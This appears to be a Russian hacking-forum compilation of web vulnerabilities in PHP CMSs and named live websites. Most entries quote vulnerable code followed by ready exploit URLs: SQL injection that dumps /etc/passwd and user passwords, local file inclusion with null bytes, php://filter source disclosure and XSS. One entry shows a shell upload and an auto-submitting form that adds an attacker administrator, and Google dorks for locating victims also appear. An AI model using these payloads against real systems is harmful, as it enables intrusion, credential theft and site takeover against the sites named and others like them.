evil-grin.com читалка index.php PHP: import_request_variables("gP", "_"); $n = $_n; $b = $_b; if($n==''){$n = 'index.html';} $node = "/var/www/evil-grin.com/jargon/html/".$n; if($b == 'entry'){$node = "/var/www/evil-grin.com/jargon/html/entry/".$n;} function parse_jargon($file, $b, $n){ $file = eregi_replace('\\\\', '', $file); $file = eregi_replace(' ', '+', $file); $pos = strpos($n, '/'); if($pos){ $pos++; $m = substr($n, 0, $pos); } if(file_exists($file)){ $data = join ('', file ($file)); $data = eregi_replace('<html.*<body*>', '', $data); $data = ereg_replace('src="html/graphics/', $data); $data = ereg_replace("href=\"", "href=\"index.php?b=$b&n=$m", $data); $data = ereg_replace("href=\"index.php\?b=$b&n=$m" . "entry/", "href=\"index.php?b=entry&n=", $data); $data = ereg_replace("href=\"index.php\?b=$b&n=$m" . "\.\./", "href=\"index.php?n=", $data); $data = ereg_replace("href=\"index.php\?b=$b&n=$m" . "http", "href=\"http", $data); $data = ereg_replace("href=\"index.php\?b=$b&n=$m" . "mailto", "href=\"mailto", $data); }else{ $data = "$file not found"; } return $data; } http://evil-grin.com/jargon/index.php?n=../index.php SQL bmarks.php PHP: import_request_variables("gP", "_"); $c = $_c; $db = mysql_connect("localhost", "apache", "xyzzy"); mysql_select_db("evil",$db); if($c == ""){ $result = mysql_query("SELECT id, cat, notes from lnk_cat ORDER BY cat",$db); while ($myrow = mysql_fetch_row($result)) { $oput .= "<DT><B><A HREF=\"bmarks.php?c=$myrow[0]\" CLASS=\"led\">$myrow[1]</B></A>\n"; $oput .= "<DD CLASS=\"text\">$myrow[2]\n"; } }else{ $result = mysql_query("SELECT cat from lnk_cat WHERE id = $c",$db); $myrow = mysql_fetch_row($result); $cat = $myrow[0]; $result = mysql_query("SELECT id, uri, txt, notes from links WHERE cat = $c ORDER BY txt",$db); http://www.evil-grin.com/bmarks.php?c=-3+union+select+1,2,version(),load_file(0x2F6574632F706173737764)+from+mysql.user--
Product: SetCMS Author: http://setcms.org Version: 3.6.5 LFI Need: magic_quotes_gpc = off; File: index.php PHP: if (file_exists("modules/$set/index.php")) { if (file_exists("modules/$set/config.php")) { include ("modules/$set/config.php"); } include ("modules/$set/index.php"); Target: ?set=../rss.php%00
termassaojoao.com.br Copyright: Andre Klunk - 2007 | Todos os direitos reservados index.php PHP: if($_GET[conteudo]) { include("$_GET[conteudo]"); } при allow_url_include = Off — LFI: http://www.termassaojoao.com.br/index.php?conteudo=php://filter/read=convert.base64-encode/resource=index.php
econsult.tv c FreelanceFuture.com 2008 SQL browse2.php PHP: $nodeId = isset($_GET['id'])? $_GET['id'] : 0; ... $strSql = "SELECT * FROM ".CLIPTBL." WHERE browsenode=".$nodeId." ORDER BY ranking".$pageSql; http://www.econsult.tv/browse2.php?id=-21+union+select+1,2,3,load_file(0x2F6574632F706173737764),5,concat_ws(0x203a20,version(),user(),host,user,password,file_priv),7,8+from+mysql.user-- (PS /root очень близко)
jedit.org LFI index.php PHP: $page = $_GET['page']; if ($page == "") $page = "main"; ?> <title> jEdit - Programmer's Text Editor - <?php include($page.".title"); ?> </title> http://www.jedit.org/index.php?page=../../../../../../../../../../etc/passwd%00
PHP: //-------------------------------------------------- // Tiny Blogr 1.0.0rc4 (search) SQL Injection //-------------------------------------------------- //-------------------------------------------------- //Author: Ctacok //Date: 11 December 2009. //Special for Antichat //-------------------------------------------------- // //Need: //magic_quotes = Off. // //-------------------------------------------------- //Script info: //Version: 1.0.0rc4. //Author: Redlinesoft, Trilexcom . //Official site: http://tinyblogr.sourceforge.net/ //-------------------------------------------------- //Vulnerabilty ///search/ //POST: txtKeyword //Usage: exploit.php?url=target.com/path // password = md5($password); // 1%' union select concat_ws(0x3A73716C5F696E6A3A,memUsername,memPassword),null,null,null,null,null,null,null from tbl_epo_member -- ^^ Просто нашёл на компе .txt файл с этим контентом, COPY + PASTE, и всё. Переоформлять не стал, ещё время гробить =\
Product: Stash CMS Version: 1.0.3 Author: http://sourceforge.net/projects/nice-stash/ SQL-inj & Download any files. File: downloadmp3.php PHP: function force_download ($data, $name) { header("Content-Length: " . filesize($data)); header('Content-Type: audio/mp3'); header('Content-Disposition: attachment; filename='.$name); readfile($data); } if(isset($_GET['download'])) { $mp3id = $_GET['download']; $query = "SELECT * FROM ".TBPREFIX."_mp3 WHERE mp3_id = '$mp3id'"; $result = $database->sqlQuery($query); if($result) { foreach($result as $result) { $filename = $result['mp3_filename']; } $filepath = UPLOADSPATH.'/mp3/'.$filename; force_download($filepath, $filename); } } $database->sqlQuery PHP: function sqlQuery($query, $return = TRUE, $complex = TRUE){ $this->result_set = mysql_query($query,$this->conn)or die("Query error: ". mysql_error()); if($return){ $query_results = array(); $i = 0; while($row = mysql_fetch_array($this->result_set, MYSQL_ASSOC)){ foreach($row as $key => $value){ $query_results[$i][$key] = $value; } $i++; } if(count($query_results) == 1 && $complex == FALSE){ $tmp_result = array(); $tmp_result = $query_results['0']; $query_results = array(); $query_results = $tmp_result; } mysql_free_result($this->result_set); return $query_results; } elseif(!$return && !$this->result_set){ mysql_free_result($this->result_set); return FALSE; } elseif(!$return && $this->result_set){ return TRUE; } } Target: 3'+union+select+1,2,3,4,5,version%28%29+--+ Вывод в ошибке filesize(); Если скулю крутить лень,можно все сделать проще. Target: ?download=3'+union+select+1,2,3,4,5,'../../admin/config.php'+--+ Файл который вам предложит скачать браузер - конфиг сервера,качать можно произвольные файлы,хоть etc/passwd,главное подобрать пути.
Маленькая зарисовочка. Product: webEdition Version: 6.0.0.7 Author: http://www.webedition.de/ Code: [B]LFI:[/B] [COLOR=Red]Need: register_globals = on[/COLOR] File: /we/include/we_html_tools.inc.php Target: ?WE_LANGUAGE=../../{LOCAL_FILE}%00 File: /delInfo.php Target: ?WE_LANGUAGE={LOCAL_FILE}%00 File: /moveInfo.php Target: ?WE_LANGUAGE={LOCAL_FILE}%00 File: /noAviable.php Target: ?WE_LANGUAGE={LOCAL_FILE}%00 File: /noExist.php Target: ?WE_LANGUAGE={LOCAL_FILE}%00 File: /notPublished.php Target: ?WE_LANGUAGE={LOCAL_FILE}%00 [B]Full Path Disclosure:[/B] File: mozillamenu.php Target: Enter in your browser: /mozillamenu.php [B]Phpinfo()[/B] File: phpino.php Target: Log in, then enter in your browser: phpinfo.php Без кода; если смогу — завтра выложу.
Clean Nuke 1.1 Продукт: Clean Nuke Версия: 1.1 Автор: matteoiamma (phpnuke.org) Скачать: http://sourceforge.net/projects/cleanuke/ Local File Include Условия: Права администратора. Уязвимая часть кода: Сначала переменная $xlanguage заносится в БД в скрипте Code: /admin/modules/settings.php PHP: ... $xlanguage = addslashes(check_words(check_html($xlanguage, "nohtml"))); ... $db->sql_query("UPDATE ".$prefix."_config SET ... language='$xlanguage' ..."); ... Далее, из БД достается значение файла языка, и почти без всяческой фильтрации оно инклудится в файле: Code: /mainfile.php PHP: $result = $db->sql_query("SELECT * FROM ".$prefix."_config"); ... $language = check_html($row['language'], "nohtml"); ... include_once("language/lang-".$language.".php"); PS: Функция check_html проверяет наличие HTML-кода в переменной, и она нам не страшна. Эксплуатация: В панели администратора, в модуле конфигурации (admin.php?op=Configure) изменяем исходный код страницы, вместо Code: <option name='xlanguage' value='english' > вписываем любой файл, например Code: <option name='xlanguage' value='english/../../index' > Кроме этого, если есть права на сервере (н.п. один и тот же хостинг), можно записать файл в папку /tmp, и проинклудить его. SQL - Инъекция Условия: magic_quotes = Off Уязвимая часть кода: Code: /page.php PHP: if (isset($_GET['pid'])){ $content_sql = $db->sql_query("SELECT * FROM ".$prefix."_pages WHERE active = '1' AND pid = '".$_GET['pid']."'"); } Эксплуатация: Code: http://site.ru/cleanuke/page.php?pid=1'+union+select+1,2,3,4,5%23 SQL - Инъекция Условия: Права администратора. magic_quotes = Off Уязвимая часть кода: Code: /admin/modules/authors.php PHP: function modifyadmin($chng_aid) { ... $row = $db->sql_fetchrow($db->sql_query("SELECT aid, name, url, email, pwd, radminsuper, admlanguage from " . $prefix . "_authors where aid='$chng_aid'")); ... 
Эксплуатация: Code: http://site.ru/cleanuke/admin.php?op=modifyadmin&chng_aid=-1'+union+select+1,concat_ws(0x3a,user(),database(),version()),3,4,5,6,7%23 SQL - Инъекция Условия: Права администратора. magic_quotes = Off Уязвимая часть кода: Code: /modules/News/admin/index.php PHP: function editStory($sid) { ... $result2 = $db->sql_query("select aid from ".$prefix."_stories where sid='$sid'"); ... Эксплуатация: Code: http://site.ru/cleanuke/admin.php?op=EditStory&sid=-1'+union+select+1,2,3,4,5,6,7,8,9%23 SQL - Инъекция Условия: Права администратора. magic_quotes = Off Уязвимая часть кода: Code: /admin/modules/content.php PHP: if (isset($_POST['pid'])){ $pid=$_POST['pid']; } elseif (isset($_GET['pid_mod'])){ $pid=$_GET['pid_mod']; } $sel_page=$db->sql_query("SELECT * FROM ".$prefix."_pages WHERE pid = '$pid'"); Эксплуатация: Code: http://site.ru/cleanuke/admin.php?op=content&pid_mod=-1'+union+select+1,2,3,4,5%23 SQL - Инъекция Условия: Права администратора. Уязвимая часть кода: Code: /admin/modules/feedbackplus.php Code: Line 119: PHP: function editfeedback($fid) { ... $result = sql_query("SELECT * FROM $prefix"._feedbackplus." WHERE fid=$fid", $dbi); ... Эксплуатация: Code: http://site.ru/cleanuke/admin.php?op=editfeedback&lid=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12 Дорк Хотя название движка - Clean Nuke, дорк такой: Code: "Powered by WL-Nuke"
Shop-Script FREE Продукт: Shop-Script FREE Оффсайт: http://shop-script.ru Скачать: http://www.shop-script.ru/shop-script-free/ru/shop-script-free.zip Blind SQL-Инъекция Условия: magic_quotes = Off Уязвимая часть кода: Code: /shop/includes/shopping_cart.php PHP: $q = db_query("select in_stock from ".PRODUCTS_TABLE." where productID='".$_GET["add2cart"]."'") or die (db_error() . "<br>select in_stock from ".PRODUCTS_TABLE." where productID='".$_GET["add2cart"]."'"); $is = db_fetch_row($q); $is = $is[0]; //$_SESSION[gids] contains product IDs //$_SESSION[counts] contains product quantities ($_SESSION[counts][$i] corresponds to $_SESSION[gids][$i]) //$_SESSION[gids][$i] == 0 means $i-element is 'empty' if (!isset($_SESSION["gids"])) { $_SESSION["gids"] = array(); $_SESSION["counts"] = array(); } //check for current item in the current shopping cart content $i=0; while ($i<count($_SESSION["gids"]) && $_SESSION["gids"][$i] != $_GET["add2cart"]) $i++; if ($i < count($_SESSION["gids"])) //increase current product's quantity { $_SESSION["counts"][$i]++; } else //no item - add it to $gids array { $_SESSION["gids"][] = $_GET["add2cart"]; $_SESSION["counts"][] = 1; } header("Location: index.php?shopping_cart=yes"); } if (isset($_GET["remove"]) && $_GET["remove"] > 0) //remove from cart product with productID == $remove { $i=0; while ($i<count($_SESSION["gids"]) && $_SESSION["gids"][$i] != $_GET["remove"]) $i++; if ($i<count($_SESSION["gids"])) $_SESSION["gids"][$i] = 0; header("Location: index.php?shopping_cart=yes"); } if (isset($_POST["update"])) //update shopping cart content { foreach ($_POST as $key => $val) if (strstr($key, "count_")) { //select product's in stock level $q = db_query("select in_stock from ".PRODUCTS_TABLE." 
where productID='".str_replace("count_","",$key)."'") or die (db_error() ); $is = db_fetch_row($q); $is = $is[0]; if ($val > 0) { for ($i=0; $i<count($_SESSION["gids"]); $i++) { if ($_SESSION["gids"][$i] == str_replace("count_","",$key)) { $_SESSION["counts"][$i] = floor($val); } } } else //remove { $i=0; while ($_SESSION["gids"][$i] != str_replace("count_","",$key) && $i<count($_SESSION["gids"])) $i++; $_SESSION["gids"][$i] = 0; } } Эксплуатация: Code: http://site.ru/shop/index.php?shopping_cart=yes&add2cart=72'+and+substring(@@version,1,1)=5%23 SQL-Инъекция Условия: magic_quotes = Off Права администратора Уязвимая часть кода: Code: /products.php PHP: $q = db_query("SELECT categoryID, name, description, customers_rating, Price, picture, in_stock, thumbnail, big_picture, brief_description, list_price, product_code FROM ".PRODUCTS_TABLE." WHERE productID='".$_GET["productID"]."'") or die (db_error()); Эксплуатация: Code: http://site.ru/shop/products.php?productID=-1'+union+select+1,2,3,4,5,6,7,8,9,10,11,12%23 Blind SQL-Инъекция Условия: magic_quotes = Off Права администратора Уязвимая часть кода: Code: /shop/includes/admin/sub/catalog_products_categories.php PHP: $categoryID = isset($_GET["categoryID"]) ? $_GET["categoryID"] : $_POST["categoryID"]; $q = db_query("SELECT name FROM ".CATEGORIES_TABLE." WHERE categoryID<>0 and categoryID='$categoryID'") or die (db_error()); $row = db_fetch_row($q); Эксплуатация: Code: http://site.ru/shop/admin.php?dpt=catalog&sub=products_categories&categoryID=1'+and+substring(@@version,1,1)=5%23 SQL-Инъекция Условия: magic_quotes = Off Права администратора Уязвимая часть кода: Code: /category.php PHP: $q = db_query("SELECT name, description, picture FROM ".CATEGORIES_TABLE." WHERE categoryID='".$_GET["c_id"]."' and categoryID<>0") or die (db_error()); Эксплуатация: Code: http://localhost/bug/shop/category.php?c_id=-1'+union+select+1,2,3%23&w=23 Дорк: Code: "Powered by Shop-Script FREE"
Просто гугл выдал кучу таких сайтов. CubeCart™ Раскрытие путей: http://../modules/gateway/ — ибо в этой папке есть файл Index.php, а в нём PHP: $module = "gateway"; include("../index.php"); ?> а в modules/ нет файла Index.php bgg =) Dork:
chinmaya.org ViewSource downloadfile.php PHP: <? $filename = $filename; $ext = substr(strrchr($filename, "."), 1); $bytes = filesize("downloadfile/$filename"); header("Content-type: application/$ext"); header("Content-disposition: attachment; filename=\"$filename\""); header("Content-length: $bytes"); @readfile("downloadfile/$filename"); ?> http://www.chinmaya.org/downloadfile.php?filename=../../../../../../../../../../etc/passwd%00 php.ini magic_quotes_gpc = Off register_globals = On SQL news_detail.php PHP: $sqlnews = "select * from newsmaster where newsid='$nid'"; http://www.chinmaya.org/news_detail.php?nid=-123'+union+select+1,2,3,4,5,6,7,8,9,10,11,concat_ws(0x203a20,version(),user(),database()),13,14,15+--+ acharya.php PHP: $sqlach = "select * from acharyamaster where acharyaid='$id'"; http://www.chinmaya.org/acharya.php?id=12'+order+by+100+--+ events_detail.php PHP: $sqlevents = "select * from eventsmaster where eventid='$eid'"; http://www.chinmaya.org/events_detail.php?eid=342'+order+by+100+--+
OwnRS http://sourceforge.net/projects/ownrs/ index.php PHP: $hledany_vyraz = $_GET["hledej"]; ... if($hledany_vyraz!="") $pocet=MySQL_Query("SELECT count(id) FROM ".$db_prefix."clanky WHERE (nepublikovat = 0) AND (datum<now()) AND MATCH(nadpis) AGAINST('$hledany_vyraz') OR MATCH(popis) AGAINST('$hledany_vyraz') OR MATCH(clanek) AGAINST('$hledany_vyraz') ORDER BY (10 * MATCH(nadpis) AGAINST('$hledany_vyraz') + MATCH(popis) AGAINST('$hledany_vyraz') + MATCH(clanek) AGAINST ('$hledany_vyraz'))"); ... if($hledany_vyraz!=""){ $vysledek=mysql_query("SELECT *, DATE_FORMAT(`datum`, '%d.%m.%Y') AS `casformat` from ".$db_prefix."clanky WHERE (nepublikovat = 0) AND (datum<now()) AND (datum<now()) AND MATCH(nadpis) AGAINST('$hledany_vyraz') OR MATCH(popis) AGAINST('$hledany_vyraz') OR MATCH(clanek) AGAINST('$hledany_vyraz') ORDER BY (10 * MATCH(nadpis) AGAINST('$hledany_vyraz') + MATCH(popis) AGAINST('$hledany_vyraz') + MATCH(clanek) AGAINST ('$hledany_vyraz')) LIMIT $strana, $max") or die ("Chyba při práci s databází"); $Obsah = '<h1>Vyhledávání výrazu '.$hledany_vyraz.'</h1> <strong> Pro výraz '.$hledany_vyraz.' nalezeny tyto záznamy: </strong><br />'; $TitleWebu = 'Vyhledávání výrazu '.$hledany_vyraz.' - '.$TitleWebu; } $x=0; //Sosám data z databáze while ($zaznam=MySQL_Fetch_Array($vysledek)) { $zobrazeni = $zaznam['hint']; $nadpis_bez_diakritiky = seourl($zaznam['nadpis']); //Jakou verzi odkazů vybrat? 
if($pekna_url != 0){ $odkaz = $zaznam["id"].'-'.$nadpis_bez_diakritiky.'.html'; }else{ $odkaz = 'clanek.php?id='.$zaznam["id"].'-'.$nadpis_bez_diakritiky; } $id2 = $zaznam['kategorie']; $casformat = $zaznam["casformat"]; $autor = $zaznam['autor']; $jmeno_autora= mysql_query("SELECT nick FROM ".$db_prefix."autori WHERE id = '".$autor."'"); while($zaznam_autor = mysql_fetch_array($jmeno_autora)){ $nazev_autora = $zaznam_autor['nick']; //počítání počtu komentářů a následný výpis slova v různém pádě podle počtu $dotaz = "SELECT count(id) AS pocet FROM ".$db_prefix."komentare WHERE idclanku ='".$zaznam["id"]."'"; if($v = mysql_query($dotaz)) { $r = mysql_fetch_assoc($v); $komentare=$r["pocet"]; }else{echo "Chyba při práci s databází";} if($komentare!=0){ if($komentare<2) $komentare_vypis = '<a href="'.$odkaz.'#komentare">1 komentář</a>'; else if(($komentare<5)&&($komentare>1)) $komentare_vypis = '<a href="'.$odkaz.'#komentare">'.$komentare.' komentáře</a>'; else if($komentare>4) $komentare_vypis = '<a href="'.$odkaz.'#komentare">'.$komentare.' komentářů</a>'; }else $komentare_vypis = '<a href="'.$odkaz.'#komentare">Žádný komentář</a>'; //Zjišťování názvu kategorie a přezdívky autora $nazev_kategorie = mysql_query("SELECT nazev FROM ".$db_prefix."kategorie WHERE id = '".$id2."'"); while ($udaj = mysql_fetch_array($nazev_kategorie)) $jmeno_kategorie = $udaj['nazev']; уязвим параметр $hledany_vyraz = $_GET["hledej"]; Passive XSS http://localhost/Own_rs/index.php?hledej=1%3Cscript%3Ealert(121212)%3C/script%3E SQL mq=off http://localhost/Own_rs/index.php?hledej=')+union+select+11,12,13,14,15,16,17,18,19,110,111,112;%00+--+ Запрос $vysledek=mysql_query("SELECT *, DATE_FORMAT(`datum`, '%d.%m.%Y') AS `casformat ... записан в несколько строк, поэтому комментарии вида +--+ дают ошибку, ставим более жёсткий терминатор ;%00+--+. Сработал $vysledek=mysql_query("SELECT ... но это Blind SQL, попробуем получить вывод. 
$autor = $zaznam['autor']; $jmeno_autora= mysql_query("SELECT nick FROM ".$db_prefix."autori WHERE id = '".$autor."'"); $zaznam['autor'] берется из запроса $vysledek (поле с числом 17), сформируем иньекцию. http://localhost/Own_rs/index.php?hledej=')+union+select+11,12,13,14,15,16,%2217'+or+1=1+limit+0,1+--+%22,18,19,110,111,112;%00+--+ появился вывод в полях 12, 13, 112 http://localhost/Own_rs/index.php?hledej=')+union+select+11,version(),concat_ws(0x203a20,jmeno,heslo,prava),14,15,16,%2217'+or+1=1+limit+0,1+--+%22,18,19,110,111,database()+from+ownrs_autori;%00+--+
Corporate Merchandise Solution — скрипт коммерческий, однако CMS фактически не является. Blind SQL inj, пример: WR-Board v 1.5> XSS (с) Twin $park
cms pragmaMx 0.1.11 http://www.pragmamx.org/Downloads-op-view-lid-731.html dork: "This Website based on pragmaMx" Passive XSS уязвимы параметры newlang, name, op, query, show_all,orderby, min, cid, id http://localhost/html/index.php?newlang=1>"><script>alert(121212);</script> http://localhost/html/index.php?newlang=1>"><script>alert(121212)%3B</script> http://localhost/html/modules.php?name=1>"><script>alert(121212)%3B</script> http://localhost/html/modules.php?name=nnn&newlang=1>"><script>alert(121212)%3B</script> http://localhost/html/modules.php?name=nnn&op=NewLinks&query=1>"><script>alert(121221)%3B</script>&min=0&orderby=dateD http://localhost/html/modules.php?name=nnn&show_all=1>"><script>alert(121212)%3B</script> http://localhost/html/modules.php?name=nnn&op=AddEntry&query=111&min=0&orderby=1%22'%3E%3Cscript%3Ealert(121212)%3B%3C/script%3E http://localhost/html/modules.php?name=nnnt&min=1%3E%22%3E%3Cscript%3Ealert(121212)%3B%3C/script%3E&orderby=dateD&cid=0 http://localhost/html/modules.php?name=nnn&rop=showcontent&id=1%3E%22%3E%3Cscript%3Ealert(121212)%3B%3C/script%3E SQL права админа admin/modules/banners.php PHP: function bannerdelete($bid, $ok = 0) { global $prefix, $bgcolor2, $bgcolor3, $script; if (!empty($ok)) { if ($ok == 1) { } sql_query("delete from " . $prefix . "_banner where bid='$bid'"); header("Location: admin.php?op=banneradmin#top"); } else { include("header.php"); GraphicAdmin(); OpenTable(); echo "<center><font class=\"title\"><b>" . _BANNERSADMIN . "</b></font><br /><br />"; echo "<a href=\"admin.php?op=banneradmin\">" . _BACKTO . " " . _ADMINMENU . "</a></center>"; CloseTable(); echo '<br />'; $result = sql_query("select bid,imptotal,impmade,clicks,imageurl,clickurl,alttext,script,active,typ from " . $prefix . 
"_banner where bid=$bid"); list($bid, $imptotal, $impmade, $clicks, $imageurl, $clickurl, $alttext, $script, $active, $typ) = sql_fetch_row($result); http://localhost/html/admin.php?op=bannerdelete&bid=-1+union+select+1,version(),3,4,5,6,7,8,9,10+--+&ok=0 PHP: function banneredit($bid) { global $prefix; include("header.php"); GraphicAdmin(); OpenTable(); echo "<center><font class=\"title\"><b>" . _BANNERSADMIN . "</b></font><br /><br />"; echo "<a href=\"admin.php?op=banneradmin\">" . _BACKTO . " " . _ADMINMENU . "</a></center>"; CloseTable(); echo '<br />'; $result = sql_query("select cid, imptotal, impmade, clicks, imageurl, clickurl, alttext, script, typ, active from " . $prefix . "_banner where bid=$bid"); http://localhost/html/admin.php?op=banneredit&bid=-1+union+select+1,2,3,4,version(),6,7,8,9,10+--+&ok=0 PHP: function bannerclientdelete($cid, $ok = 0) { global $prefix, $bid, $cid, $impmade, $clicks, $imageurl, $alttext, $bdate, $typ, $script; if (!empty($ok)) { if ($ok == 1) { sql_query("delete from " . $prefix . "_banner where cid='$cid'"); sql_query("delete from " . $prefix . "_bannerclient where cid='$cid'"); } header("Location: admin.php?op=banneradmin#top"); } else { include("header.php"); GraphicAdmin(); OpenTable(); echo "<center><font class=\"title\"><b>" . _BANNERSADMIN . "</b></font><br /><br />"; echo "<a href=\"admin.php?op=banneradmin\">" . _BACKTO . " " . _ADMINMENU . "</a></center>"; CloseTable(); echo '<br />'; OpenTableAl(); $result2 = sql_query("select bid,cid,impmade,clicks,imageurl,clickurl,alttext,datestart,typ,script from " . $prefix . "_banner where cid=$cid"); http://localhost/html/admin.php?op=bannerclientdelete&cid=-1+union+select+1,2,3,4,5,6,7,8,9,version()+--+ PHP: function bannerclientedit($cid) { global $prefix; include("header.php"); GraphicAdmin(); OpenTable(); echo "<div align=\"center\"><font class=\"title\"><b>" . _BANNERSADMIN . "</b></font><br /><br />"; echo "<a href=\"admin.php?op=banneradmin\">" . _BACKTO . " " . 
_ADMINMENU . "</a></div>"; CloseTable(); echo '<br />'; $result = sql_query("select name, contact, email, login, passwd, extrainfo from " . $prefix . "_bannerclient where cid=$cid"); list($name, $contact, $email, $login, $passwd, $extrainfo) = sql_fetch_row($result); http://localhost/html/admin.php?op=bannerclientedit&cid=-1+union+select+1,version(),3,4,5,6+--+ ================== Обновилась версия CMS до PragmaMX 0.1.12. В ней добавлен новый модуль — osc2pragmaMX, это уже известная osCommerce Online Merchant v2.2 RC2a. Соответственно появилась уязвимость: catalog/admin/includes/application_top.php PHP: ... // redirect to login page if administrator is not yet logged in if (!tep_session_is_registered('admin')) { if (isset($_COOKIE['admin'])){ $bridge_admin = $_COOKIE['admin']; $bridge_admin_login = false; if (!is_array($bridge_admin)) { $bridge_admin = base64_decode($bridge_admin); $bridge_admin = addslashes($bridge_admin); $bridge_admin = explode(":", $bridge_admin); } $bridge_adminid = $bridge_admin[0]; $bridge_adminpwd = $bridge_admin[1]; $bridge_adminid = substr(addslashes($bridge_adminid), 0, 25); if (!empty($bridge_adminid) && !empty($bridge_adminpwd)) { $sql = "SELECT pwd FROM ".$prefix."_authors WHERE aid='$bridge_adminid'"; $result = tep_db_query($sql); $pass = tep_db_fetch_array($result); if ($pass['pwd'] == $bridge_adminpwd && !empty($pass['pwd'])){ tep_session_register('admin'); } } }else{ $redirect = false; $current_page = basename($PHP_SELF); if ($current_page != FILENAME_LOGIN) { if (!tep_session_is_registered('redirect_origin')) { tep_session_register('redirect_origin'); $redirect_origin = array('page' => $current_page, 'get' => $HTTP_GET_VARS); } $redirect = true; } if ($redirect == true) { tep_redirect(tep_href_link(FILENAME_LOGIN)); } unset($redirect); } уязвимость находится в строках PHP: $current_page = basename($PHP_SELF); if ($current_page != FILENAME_LOGIN) { С точки зрения обычного (если он не посещает antichat.ru) программиста это безупречная 
проверка, но конструкция admin/any_file.php/login.php проходит эту проверку, а на выполнение подается any_file.php. Заливка шелла запускаем файловый менеджер http://demo.osc2pragmamx.org/modules/catalog/admin/file_manager.php/login.php не забываем добавлять к УРЛу login.php новый файл http://demo.osc2pragmamx.org/modules/catalog/admin/file_manager.php/login.php?action=new_file Добавляем себя в админы. AddAdm.html PHP: <form method="post" action="http://demo.osc2pragmamx.org/modules/catalog/admin/administrators.php/login.php?action=insert"> <input type=hidden name="username" value="as" /> <input type=hidden name="password" value="123123" /> <input type=hidden name="x" value="16" /> <input type=hidden name="y" value="13" /> </form> <script>document.getElementsByTagName("form")[0].submit();</script> Уязвимость работает, даже если модуль не подключен, поскольку для запуска используем не CMS, а путь до скрипта http:/site.com/path_cms/modules/catalog/admin/any_file.php
Дабы не копировать по 5 раз. Лучше дам просто ссылку на пост, надеюсь так можно. Там 1 движок News Edit, а второй что-то похожее на движек, просто компания делает сайты все как один, потому это тоже можно назвать движком http://forum.antichat.ru/threadedpost1839460.html#post1839460
cms awcm v2_1 final http://sourceforge.net/projects/awcm/ header.php PHP: if(isset($_GET['id'])) { $gid = $_GET['id']; if(!is_numeric($gid) OR $gid == "") { exit; } } if(isset($_GET['pm'])) { $gpm = $_GET['pm']; if(eregi("'",$gpm) OR eregi("SELECT",$gpm) OR eregi("union",$gpm) OR eregi("delete",$gpm) OR eregi("table",$gpm) OR eregi("member",$gpm) OR eregi("update",$gpm) OR eregi('admin',$gpm) OR $gpm == "") { exit; } } if(isset($_GET['search'])) { $gsearch = $_GET['search']; if(eregi("'",$gsearch)) { exit; } } .... if(isset($_COOKIE['awcm_theme'])) { $theme_file = $_COOKIE['awcm_theme']; } else { $theme_file = $mysql_maininfo_row['defult_theme']; } if(isset($_COOKIE['awcm_lang'])) { $lang_file = $_COOKIE['awcm_lang']; } else { $lang_file = $mysql_maininfo_row['defult_language']; } @include ("themes/$theme_file/settings.php"); include ("common.php"); @include ("languages/$lang_file"); $member_cok = $_COOKIE['awcm_member']-197; if(isset($_SESSION['awcm_member'])) { $member = $_SESSION['awcm_member']; } elseif (isset($_COOKIE['awcm_member'])) { $mysql_checkdookie51_member_query = mysql_query("SELECT password,id FROM awcm_members WHERE id = '$member_cok'"); $mysql_checkdookie51_member_row = mysql_fetch_array($mysql_checkdookie51_member_query); $mysql_checkdookie51_member_total = mysql_num_rows($mysql_checkdookie51_member_query); if ($mysql_checkdookie51_member_total > 0) { $member = $mysql_checkdookie51_member_row['id']; $_SESSION['awcm_member'] = $mysql_checkdookie51_member_row['id']; } } else { $member = 'no'; } LFI mq=off http://localhost/awcm/header.php cookies awcm_theme=../../../../../../../../etc/passwd%00 LFI http://localhost/awcm/header.php cookies awcm_lang=../../../../../../../../etc/passwd Заходим админом http://localhost/awcm/index.php cookies awcm_member=198 ----------------------- include/avatar.php PHP: include ("../connect.php"); $gh = $_GET['h']; $gw = $_GET['w']; $gid = $_GET['id']; $mysql_query = mysql_query("SELECT id,avatar FROM awcm_members WHERE 
id = '$gid'"); $mysql_total = mysql_num_rows($mysql_query); $mysql_row = mysql_fetch_array($mysql_query); if($mysql_total == 1) { if($mysql_row['avatar'] == "") { print '<img src="../images/no_avatar.jpg" height="'.$gh.'" width="'.$gw.'" />'; } else { print '<img src="'.$mysql_row['avatar'].'" height="'.$gh.'" width="'.$gw.'" />'; } } else { print '<img src="../images/no_avatar.jpg" height="'.$gh.'" width="'.$gw.'" />'; } Passive XSS mq=off http://localhost/awcm/includes/avatar.php?h=1>"><SCRiPt>alert(1212);</SCRiPt> http://localhost/awcm/includes/avatar.php?w=1>"><SCRiPt>alert(1212);</SCRiPt> SQL mq=off http://localhost/awcm/includes/avatar.php?id=1'+and+1=2+union+select+1,version()+--+ ----------------------- includes/show_vid_title.php PHP: include ("../connect.php"); $gid = $_GET['id']; $mysql_show_vid_title_php_query = mysql_query("SELECT id,title FROM awcm_videos_videos WHERE id = '$gid'"); $mysql_show_vid_title_php_row = mysql_fetch_array($mysql_show_vid_title_php_query); print $mysql_show_vid_title_php_row['title']; SQL mq=off http://localhost/awcm/includes/show_vid_title.php?id=-1'+union+select+1,version()+--+ =============== RulleR можно member_cp_pm.php PHP: include ("header.php"); ... if(isset($_GET['pm'])) { $mysql_mmbrcppmviewpmpg_query = mysql_query("SELECT * FROM awcm_member_pms WHERE hash = '$_GET[pm]' AND reciever = '$member' OR hash = '$_GET[pm]' AND sender = '$member'"); SQL mq=off http://localhost/awcm/member_cp_pm.php?pm=%00'+union+select+1,2,3,version(),5,6,7;+--+
SmartyCMS http://sunet.dl.sourceforge.net/project/smartycms/smartycms/0.9.4 build 334/smartycms-0.9.4-334.zip Passive XSS http://localhost/smartycms-0.9.4-334/index.php?page=tutorial&cmsUserRole=1>'><script>alert(121212);</script> ---------------- js/tiny_mce/plugins/ibrowser/scripts/loadmsg.php PHP: $l = (isset($_REQUEST['lang']) ? new PLUG_Lang($_REQUEST['lang']) : new PLUG_Lang($cfg['lang'])); $l->setBlock('ibrowser'); js/tiny_mce/plugins/ibrowser/langs/lang.class.php PHP: function setBlock( $value ) { $this -> block = $value; function getLang() { $this -> lang = $value; function loadData() { global $cfg; include( dirname(__FILE__) . '/' . $this -> lang.'.php' ); LFI mq=off http://localhost/smartycms-0.9.4-334/js/tiny_mce/plugins/ibrowser/scripts/loadmsg.php?lang=../../../../../../../../../../boot.ini%00 аналогично 